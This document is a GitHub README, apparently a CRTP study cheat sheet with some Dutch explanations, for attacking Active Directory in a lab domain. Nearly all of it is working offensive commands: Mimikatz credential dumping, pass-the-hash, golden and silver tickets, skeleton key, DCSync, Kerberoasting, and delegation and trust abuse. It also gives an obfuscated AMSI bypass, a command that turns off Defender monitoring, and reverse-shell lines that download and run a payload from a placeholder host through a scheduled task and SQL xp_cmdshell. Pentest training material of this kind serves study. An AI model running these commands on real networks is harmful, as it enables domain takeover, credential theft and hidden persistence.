Skip to content

Latest commit

 

History

History
1149 lines (945 loc) · 35.6 KB

README.md

File metadata and controls

1149 lines (945 loc) · 35.6 KB
Raw

CRTP-cheatsheet

Summary

General

Access C disk of a computer (check local admin)

ls \\<computername>\c$

Use this parameter to not print errors powershell

-ErrorAction SilentlyContinue

Rename powershell windows

$host.ui.RawUI.WindowTitle = "<naam>"

Impacket PSexec impacket

If no LM Hash use an empty one: aad3b435b51404eeaad3b435b51404ee

python3 psexec.py -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME>@<TARGET>
python3 psexec.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>

Domain Enumeration

Powerview Domain

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

. ./PowerView.ps1

Get current domain

Get-NetDomain

Get object of another domain

Get-NetDomain -Domain <domainname>

Get Domain SID for the current domain

Get-DomainSID

Get the domain password policy

Get-DomainPolicy
(Get-DomainPolicy)."System Access"
net accounts

Powerview users groups and computers

Get Information of domain controller

Get-NetDomainController
Get-NetDomainController | select-object Name

Get information of users in the domain

Get-NetUser
Get-NetUser -Username <username>

Get list of all users

Get-NetUser | select samaccountname

Get list of usernames, last logon and password last set

Get-NetUser | select samaccountname, lastlogon, pwdlastset
Get-NetUser | select samaccountname, lastlogon, pwdlastset | Sort-Object -Property lastlogon

Get list of usernames and their groups

Get-NetUser | select samaccountname, memberof

Get list of all properties for users in the current domain

get-userproperty -Properties pwdlastset

Get descripton field from the user

Find-UserField -SearchField Description -SearchTerm "built"
Get-netuser | Select-Object samaccountname,description

Get computer information

Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer -Computername <computername> -FullData

Get computers with operating system ""

Get-NetComputer -OperatingSystem "*Server 2016*"

Get list of all computer names and operating systems

Get-NetComputer -fulldata | select samaccountname, operatingsystem, operatingsystemversion

List all groups of the domain

Get-NetGroup
Get-NetGroup -GroupName *admin*
Get-NetGroup -Domain <domain>

Get all the members of the group

Get-NetGroupMember -Groupname "Domain Admins" -Recurse
Get-NetGroupMember -Groupname "Domain Admins" -Recurse | select MemberName

Get the group membership of a user

Get-NetGroup -Username <username>

List all the local groups on a machine (needs admin privs on non dc machines)

Get-NetlocalGroup -Computername <computername> -ListGroups

Get Member of all the local groups on a machine (needs admin privs on non dc machines)

Get-NetlocalGroup -Computername <computername> -Recurse

Get actively logged users on a computer (needs local admin privs)

Get-NetLoggedon -Computername <computername>

Get locally logged users on a computer (needs remote registry rights on the target)

Get-LoggedonLocal -Computername <computername>

Get the last logged users on a computer (needs admin rights and remote registary on the target)

Get-LastLoggedOn -ComputerName <computername>

Powerview shares

Find shared on hosts in the current domain

Invoke-ShareFinder -Verbose
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC

Find sensitive files on computers in the domain

Invoke-FileFinder -Verbose

Get all fileservers of the domain

Get-NetFileServer

Powerview GPO

Get list of GPO's in the current domain

Get-NetGPO
Get-NetGPO -Computername <computername>

Get GPO's which uses restricteds groups or groups.xml for interesting users

Get-NetGPOGroup

Get users which are in a local group of a machine using GPO

Find-GPOComputerAdmin -Computername <computername>

Get machines where the given user is member of a specific group

Find-GPOLocation -Username student244 -Verbose

Get OU's in a domain

Get-NetOU -Fulldata

Get machines that are part of an OU

Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}

Get GPO applied on an OU

gplink from Get-NetOU -Fulldata

Get-NetGPO -GPOname "{<gplink>}"

Powerview ACL

Get the ACL's associated with the specified object

Get-ObjectACL -SamAccountName <accountname> -ResolveGUIDS

Get the ACL's associated with the specified prefix to be used for search

Get-ObjectACL -ADSprefix ‘CN=Administrator,CN=Users’ -Verbose

Get the ACL's associated with the specified path

Get-PathAcl -Path \\<Domain controller>\sysvol

Search for interesting ACL's

Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Search of interesting ACL's for the current user

Invoke-ACLScanner | Where-Object {$_.IdentityReference –eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}

Powerview Domain trust

Get a list of all the domain trusts for the current domain

Get-NetDomainTrust

Get details about the forest

Get-NetForest

Get all domains in the forest

Get-NetForestDomain
Get-NetforestDomain -Forest <domain name>

Get global catalogs for the current forest

Get-NetForestCatalog
Get-NetForestCatalog -Forest <domain name>

Map trusts of a forest

Get-NetForestTrust
Get-NetForestTrust -Forest <domain name>
Get-NetForestDomain -Verbose | Get-NetDomainTrust

Misc

Powerview Find all machines on the current domain where the current user has local admin access

Find-LocalAdminAccess -Verbose

. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess

. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

Powerview Find local admins on all machines of the domain (needs admin privs)

Invoke-EnumerateLocalAdmin -Verbose

Connect to machine with administrator privs

Enter-PSSession -Computername <computername>

Save and use sessions of a machine

$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Find active sessions

Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"

Find active sessions of domain admins

Invoke-UserHunter -Groupname "Domain Admins"

check access to machine

Invoke-UserHunter -CheckAccess

BloodHound

https://github.com/BloodHoundAD/BloodHound

cd Ingestors
. ./sharphound.ps1
Invoke-Bloodhound -CollectionMethod all -Verbose
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose

#Copy neo4j-community-3.5.1 to C:\
#Open cmd
cd C:\neo4j\neo4j-community-3.5.1-windows\bin
neo4j.bat install-service
neo4j.bat start
#Browse to BloodHound-win32-x64
Run BloodHound.exe
#Change credentials and login

Powershell reverse shell

Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000

Local privilege escalation

Focussing on Service issues

Privesc check all

https://github.com/enjoiz/Privesc

. .\privesc.ps1
Invoke-PrivEsc

Beroot check all

https://github.com/AlessandroZ/BeRoot

./beRoot.exe

Run powerup check all

https://github.com/HarmJ0y/PowerUp

. ./powerup
Invoke-allchecks

Run powerup get services with unqouted paths and a space in their name

Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose

Abuse service to get local admin permissions with powerup

Invoke-ServiceAbuse
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<domain>\<username>'

Jekins

Runs as local admin, go to /job/project/configure to try to see if you have build permissions in /job/project0/configure
Execute windows or shell comand into the build, you can also use powershell scripts

Add user to local admin and RDP group and enable RDP on firewall

net user <username> <password> /add /Y   && net localgroup administrators <username> /add   && net localgroup "Remote Desktop Users" <username> /add && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Lateral Movement

General

Connect to machine with administrator privs

Enter-PSSession -Computername <computername>
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Execute commands on a machine

Invoke-Command -Computername <computername> -Scriptblock {whoami} 
Invoke-Command -Scriptblock {whoami} $sess

Load script on a machine

Invoke-Command -Computername <computername> -FilePath <path>
Invoke-Command -FilePath <path> $sess

Download and load script on a machine

iex (iwr http://xx.xx.xx.xx/<scriptname> -UseBasicParsing)

AMSI Bypass

  • First one gets detected, added a new one!
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

$v=[Ref].Assembly.GetType('System.Management.Automation.Am' + 'siUtils'); $v."Get`Fie`ld"('ams' + 'iInitFailed','NonPublic,Static')."Set`Val`ue"($null,$true)

Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} $sess

Disable AV monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Execute locally loaded function on a list of remote machines

Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content <list_of_servers>)

Check the language mode

$ExecutionContext.SessionState.LanguageMode

Enumerate applocker policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Copy script to other server

ps you can edit the script and call the method you wish so it executes, since you still cant load it in

Copy-Item .\Invoke-MimikatzEx.ps1 \\<servername>\c$\'Program Files'

Mimikatz

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")

Mimikatz start powershell pass the hash (run as local admin)

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'

Mimikatz dump from SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

or

reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hiv

Mimikatz dump lsa (krbtgt to)

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Domain persistence

Golden ticket

Golden tickets zijn nagemaakte TGT tickets. TGT tickets worden gebruikt om TGS tickets aan te vragen bij de KDC(DC). De kerberos Golden Ticket is een valid TGT omdat deze ondertekend is door het KRBTGT account. Als je de hash van de KRBTGT account kan achterhalen door de hashes te dumpen op de Domain controller en deze hash niet wijzigt is het mogelijk om weer een TGT aan te vragen bij de volgende penetratietest en volledige toegang tot het domein te verkrijgen.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets

Dump hashes - Get the krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Make golden ticket

Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process To get the SID use Get-DomainSID from powerview

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Use the DCSync feature for getting krbtgt hash. Execute with DA privileges

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Check WMI Permission

Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>

Silver ticket

Silver tickets zijn nagemaakte TGS tickets. Omdat de ticket is nagemaakt op de workstation is er geen communicatie met de DC. Eeen silver ticket kan worden aangemaakt met de service account hash of computer account hash.

https://adsecurity.org/?p=2011 https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets

Make silver ticket for CIFS

Use the hash of the local computer

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:CIFS /rc4:<local computer hash> /user:Administrator /ptt"'

Check access (After CIFS silver ticket)

ls \\<servername>\c$\

Make silver ticket for Host

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'

Schedule and execute a task (After host silver ticket)

schtasks /create /S <target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''')'"

schtasks /Run /S <target> /TN “Reverse”

Make silver ticket for WMI

Execute for WMI /service:HOST /service:RPCSS

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:RPCSS /rc4:<local computer hash> /user:Administrator /ptt"'

Check WMI Permission

Get-wmiobject -Class win32_operatingsystem -ComputerName <target>

Skeleton key

De skeleton key attack is een aanval dat malware in het geheugen laad van de domain controller. Waarna het mogelijk is om als elke user the authenticeren met een master wachtwoord. Als je dit met mimikatz uitvoert is dit wachwoord 'mimikatz'. Dit laad een grote security gat waarbij dit wordt uitgevoerd! Voer dit dus niet uit in een productieomgeving zonder goed te overleggen met de klant. Om deze aanval te stoppen moet de domain controller worden herstart.

https://pentestlab.blog/2018/04/10/skeleton-key/

Create the skeleton key - Requires DA

Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>

DSRM

De Directory Services Restore Mode is een boot option waarin een domain controller kan worden opgestart zodat een administrator reparaties of een recovery kan uitvoeren op de active directory database. Dit wachtwoord wordt ingesteld tijdens het installeren van de domain controller en wordt daarna bijna nooit gewijzigd. Door de login behavior aan te passen van dit lokale account is het mogelijk om remote toegang te verkrijgen via dit account, een account waarvan het wachtwoord bijna nooit wijzigd! Pas op, dit tast de security van de domain controller aan!

Dump DSRM password - dumps local users

look for the local administrator password

Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::sam”’ -Computername <target>

Change login behavior for the local admin on the DC

New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD

If property already exists

Set-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2

Pass the hash for local admin

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer> /user:Administrator /ntlm:<hash> /run:powershell.exe"'

Custom SSP - Track logons

Het is mogelijk om met een custom Security Support Provider (SSP) alle logons op een computer bij te houden. Een SSP is een DDL. Een SSP is een DLL waarmee een applicatie een geverifieerde verbinding kan verkrijgen. Sommige SSP-pakketten van Microsoft zijn: NTLM, Kerberos, Wdigest, credSSP.

Mimikatz biedt een aangepaste SSP - mimilib.dll aan. Deze SSP registreert lokale aanmeldingen, serviceaccount- en computeraccountwachtwoorden in platte tekst op de doelserver.

Mimilib.dll

Drop mimilib.dll to system32 and add mimilib to HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
SetItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' Value $packages

Use mimikatz to inject into lsass

all logons are logged to C:\Windows\System32\kiwissp.log

Invoke-Mimikatz -Command ‘”misc:memssp”’

ACL

AdminSDHolder

De AdminSDHolder container is een speciale AD container met default security permissies die gebruikt worden als template om beveiligde AD gebruikers en groepen (Domain Admins, Enterprise Admins etc.) te beveiligen en te voorkomen dat hier onbedoeld wijzingen aan worden uitgevoerd. Nadater er toegang is verkregen tot een DA is het mogelijk om deze container aan te passen voor persistence.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence

Check if student has replication rights

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

Add fullcontrol permissions for a user to the adminSDHolder

Add-ObjectAcl -TargetADSprefix ‘CN=AdminSDHolder,CN=System’ PrincipalSamAccountName <username> -Rights All -Verbose

Run SDProp on AD (Force the sync of AdminSDHolder)

Invoke-SDPropagator -showProgress -timeoutMinutes 1

#Before server 2008
Invoke-SDpropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

Check if user got generic all against domain admins group

Get-ObjectAcl -SamaccountName “Domain Admins” –ResolveGUIDS | ?{$_.identityReference -match ‘<username>’}

Add user to domain admin group

Add-DomainGroupMember -Identity ‘Domain Admins’ -Members <username> -Verbose

or

Net group "domain admins" sportless /add /domain

Abuse resetpassword using powerview_dev

Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force ) -Verbose

DCsync

Bij een DCSync aanval immiteren we een DC om de wachtwoorden te achterhalen via domain replication. Hiervoor hebben we bepaalde rechten nodig op de domain controller.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync https://blog.stealthbits.com/what-is-dcsync-an-introduction/

Add full-control rights

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose

Add rights for DCsync

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose

Execute DCSync and dump krbtgt

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

SecurityDescriptor - WMI

. ./Set-RemoteWMI.ps1

On a local machine

Set-RemoteWMI -Username <username> -Verbose

On a remote machine without explicit credentials

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Verbose

On a remote machine with explicit credentials

Only root/cimv and nested namespaces

Set-RemoteWMI -Username <username> -Computername <computername> -Credential Administrator -namespace ‘root\cimv2’ -Verbose

On remote machine remove permissions

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Remove -Verbose

Check WMI permissions

Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>

SecurityDescriptor - Powershell Remoting

. ./Set-RemotePSRemoting.ps1

On a local machine

Set-RemotePSRemoting -Username <username> -Verbose

On a remote machine without credentials

Set-RemotePSRemoting -Username <username> -Computername <computername> -Verbose

On a remote machine remove permissions

Set-RemotePSRemoting -Username <username> -Computername <computername> -Remove

SecurityDescriptor - Remote Registry

Using the DAMP toolkit

. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval

Using DAMP with admin privs on remote machine

Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose

Retrieve machine account hash from local machine

Get-RemoteMachineAccountHash -Computername <computername> -Verbose

Retrieve local account hash from local machine

Get-RemoteLocalAccountHash -Computername <computername> -Verbose

Retrieve domain cached credentials from local machine

Get-RemoteCachedCredential -Computername <computername> -Verbose

Domain Privilege escalation

Kerberoast

Kerberoasting een technique waarbij de wachtwoorden van service accounts worden gekraakt. Kerberoasting is voornamelijk efficient indien er user accounts als service accounts worden gebruikt. Een TGS ticket kan worden aangevraagd voor deze user, waarbij de TGS versleuteld is met de NTLM hash van de plaintext wachtwoord van de gebruiker. Als de service account een user account is welke zelf is aangemaakt door de beheerder is de kans groter dat deze ticket te kraken is, en dus het wachtwoord wordt achterhaalt voor de service. Deze TGS ticket kan offline gekraakt worden. Voor de aanval word de kerberoas[https://github.com/nidem/kerberoast] repositorie van Nidem gebruikt.

Find user accounts used as service accounts

. ./GetUserSPNs.ps1

Get-NetUser -SPN

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Reguest a TGS

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

or

Request-SPNTicket "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Export ticket using Mimikatz

Invoke-Mimikatz -Command '"Kerberos::list /export"'

Crack the ticket

Crack the password for the serviceaccount

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-student1@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

.\hashcat.exe -m 18200 -a 0 <HASH FILE> <WORDLIST>

AS-REPS Roasting

AS-REPS roasting is een technique waarbij het wachtwoord achterhaald kan worden omdat de 'Do not require Kerberos preauthentication property' is aangezet, oftewel kerberos preauthentication staat uit. Een aanvaller kan de eerste stap van authenticatie overslaan en voor deze gebruiker een TGT aanvragen, welke vervolgens offline gekraakt kan worden.

Enumerating accounts with kerberos preauth disabled

. .\Powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose

Get-DomainUser -PreauthNotRequired -verbose | select samaccountname

Enumerate permissions for group

Met genoeg rechten(GenericWrite of GenericAll) is het mogelijk om kerberos preauth uit te schakelen.

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Set preauth not required

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

Request encrypted AS-REP

. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose

Enumerate all users with kerberos preauth disabled and request a hash

Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl

Crack the hash with hashcat

Edit the hash by inserting '23' after the $krb5asrep$, so $krb5asrep$23$.......

Hashcat -a 0 -m 18200 hash.txt rockyou.txt

Set SPN

Met genoeg rechten (GenericALL en GenericWrite) is het mogelijk om zelf de Service Principle Name attribute aan een gebruiker toe te voegen. Deze kan dan worden gekraakt met behulp van kerberoasting.

Enumerate permissions for group on ACL

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Check if user has SPN

. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname

of

Get-NetUser | Where-Object {$_.servicePrincipalName}

Set SPN for the user

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}

Request a TGS

Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

Export ticket to disk for offline cracking

Invoke-Mimikatz -Command '"Kerberos::list /export"'

Request TGS hash for offline cracking hashcat

Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash

Crack the hash with hashcat

Edit the hash by inserting '23' after the $krb5asrep$, so $krb5asrep$23$.......

Hashcat -a 0 -m 18200 hash.txt rockyou.txt

Unconstrained Delegation

Unconstrained delegation is een privilege welke kan worden toegekent aan gebruikers of computers, dit gebeurt bijna altijd bij computers met services zoals ISS en MSSQL. Deze services hebben meestal toegang nodig tot een backend database namens de geverifieerde gebruiker. Wanneer een gebruiker zich verifieert op een computer waarop onbeperkt Kerberos-delegatierecht is ingeschakeld, wordt het geverifieerde TGT-ticket van de gebruiker opgeslagen in het geheugen van die computer. Als je administrator toegang hebt tot deze server, is het mogelijk om alle TGT tickets uit het geheugen te dumpen.

Discover domain computers which have unconstrained delegation

Domain Controllers always show up, ignore them

 . .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountname

Check if any DA tokens are available on the unconstrained machine

Wait for a domain admin to login while checking for tokens

Invoke-Mimikatz -Command '"sekurlsa::tickets"'

Export the TGT ticket

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse the TGT ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained Delegation

Als je over een account of computer beschikt met de constrained delegation privilege is het mogelijk om je voor te doen als elk andere gebruiker en jezelf te authentiseren naar een service waar de gebruiker mag delegeren.

Enumerate

Enumerate users with contrained delegation enabled

Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Enumerate computers with contrained delegation enabled

Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Constrained delegation User

Requesting TGT with kekeo

./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

Requesting TGS with kekeo

Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

Use Mimikatz to inject the TGS ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained delegation Computer

Requesting TGT with a PC hash

./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>

Requesting TGS

No validation for the SPN specified

Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

Using mimikatz to inject TGS ticket and executing DCsync

Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'

DNS Admins

Indien je over een gebruiker bezit die lid is van de 'DNS admin' is het mogelijk om verschillende aanvallen uit te voeren op de DNS server (Meestal Domain Controller) Het is mogelijk om hier een reverse shell mee te krijgen, maar dit legt heel het DNS verkeer plat binnen het domein aangezien dit de DNS service bezighoudt! Voor meer informatie zie [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise]

Enumerate member of the DNS admin group

Get-NetGRoupMember “DNSAdmins”

From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)

Share the directory the ddl is in for everyone so its accessible. logs all DNS queries on C:\Windows\System32\kiwidns.log

Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll

Restart DNS

Sc \\<dns server> stop dns
Sc \\<dns server> start dns

Enterprise Admins

Child to parent - trust tickets

Dump trust keys

Look for in trust key from child to parent (first command) - This worked best for me! Second command didnt work :( Look for NTLM hash (second command)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\<computername>$"'

Create an inter-realm TGT

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:<domain> /sid:<sid of current domain> /sids:<sid of enterprise admin groups of the parent domain> /rc4:<trust hash> /service:krbtgt /target:<target domain> /ticket:<path to save ticket>"'

Create a TGS for a service (kekeo_old)

./asktgs.exe <kirbi file> CIFS/<forest dc name>

Use TGS to access the targeted service (may need to run it twice) (kekeo_old)

./kirbikator.exe lsa .\<kirbi file>

Check access to server

ls \\<servername>\c$

Child to parent - krbtgt hash

Get krbtgt hash from dc

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Create TGT

the mimikatz option /sids is forcefully setting the SID history for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /sids:<sids> /krbtgt:<hash> /ticket:<path to save ticket>"'

Inject the ticket

Invoke-Mimikatz -Command '"kerberos::ptt <path to ticket>"'

Get SID of enterprise admin

Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData | select samaccountname, objectsid

Crossforest attacks

Trust flow

Dump trust keys

Look for in trust key from child to parent (first command) Look for NTLM hash (second command)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'

Create a intern-forest TGT

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<domain sid> /rc4:<hash of trust> /service:krbtgt /target:<target> /ticket:<path to save ticket>"'

Create a TGS for a service (kekeo_old)

./asktgs.exe <kirbi file> CIFS/<crossforest dc name>

Use the TGT

./kirbikator.exe lsa <kirbi file>

Check access to server

ls \\<servername>\<share>\

Abuse SQL

. .\PowerUpSQL.ps1

Discovery SPN scanning

Get-SQLInstanceDomain

Check accessibility

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded – Verbose

Gather information

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Search for links to remote servers

Get-SQLServerLink -Instance <sql instance> -Verbose

Enumerate database links

Get-SQLServerLinkCrawl -Instance <sql instance> -Verbose

Enable xp_cmdshell

Execute(‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “<sql instance>”

Execute commands

Get-SQLServerLinkCrawl -Instance <sql instance> -Query "exec master..xp_cmdshell 'whoami'"

Execute reverse shell example

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000'"